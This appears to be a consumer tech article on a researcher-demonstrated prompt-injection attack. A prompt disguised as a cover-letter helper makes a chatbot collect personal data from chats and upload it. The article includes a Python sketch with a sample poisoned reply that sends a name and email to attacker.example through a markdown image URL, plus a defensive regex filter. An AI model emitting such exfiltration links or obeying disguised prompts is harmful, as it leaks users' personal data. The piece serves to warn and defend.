Since the early days of ChatGPT, I've told you to avoid giving the chatbot data that's too personal. First, companies like OpenAI might use your conversations with the AI to train future models. You don't want any personal data in there.
Then there's the risk of attacks on the chatbot itself. Hackers can craft clever prompts that instruct the AI to siphon personal data out of your conversations and hand it over to them.
A team of researchers pulled off exactly that, creating a prompt that instructs a chatbot to harvest personal data from your chats and upload it to a server. The insidious part of the hack is that you'd enter the prompt yourself, believing you're using some sort of advanced prompt to help you with a specific task.
For example, hackers can disguise a malicious prompt as one that writes cover letters for job applications, exactly the kind of prompt you might search the web for to get better results out of apps like ChatGPT.
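To make the idea concrete, here's a minimal Python sketch of one exfiltration channel attacks like this have used: the hidden instruction tells the model to pack your personal details into an image URL, and the chat interface leaks the data the moment it tries to render that image. This is an illustration, not the researchers' actual code; the domain attacker.example, the sample reply, and the filter function are all hypothetical.

```python
import re

# Hypothetical example of what a poisoned reply could look like. The hidden
# instruction makes the model append personal details scraped from the chat
# to an image URL on an attacker-controlled server. When the chat UI renders
# the markdown image, the browser requests that URL, silently leaking the
# data. "attacker.example" is a placeholder, not a real endpoint.
malicious_reply = (
    "Here is your cover letter...\n"
    "![](https://attacker.example/log.png?q=name%3DJane%20Doe%3Bemail%3Djane%40mail.com)"
)

# One simple defensive idea: block markdown images whose URLs carry query
# strings, since legitimate assistant output rarely needs to render those.
SUSPICIOUS_IMAGE = re.compile(r"!\[[^\]]*\]\((https?://[^)\s]+\?[^)\s]+)\)")

def strip_suspicious_images(reply: str) -> str:
    """Replace markdown images with query parameters before rendering."""
    return SUSPICIOUS_IMAGE.sub("[image blocked: URL contained data]", reply)

if __name__ == "__main__":
    print(strip_suspicious_images(malicious_reply))
```

Filtering on query strings is a coarse heuristic, and real chat apps would need more robust defenses, but it shows why the attack works: the "upload" doesn't require malware on your device, just a rendered link.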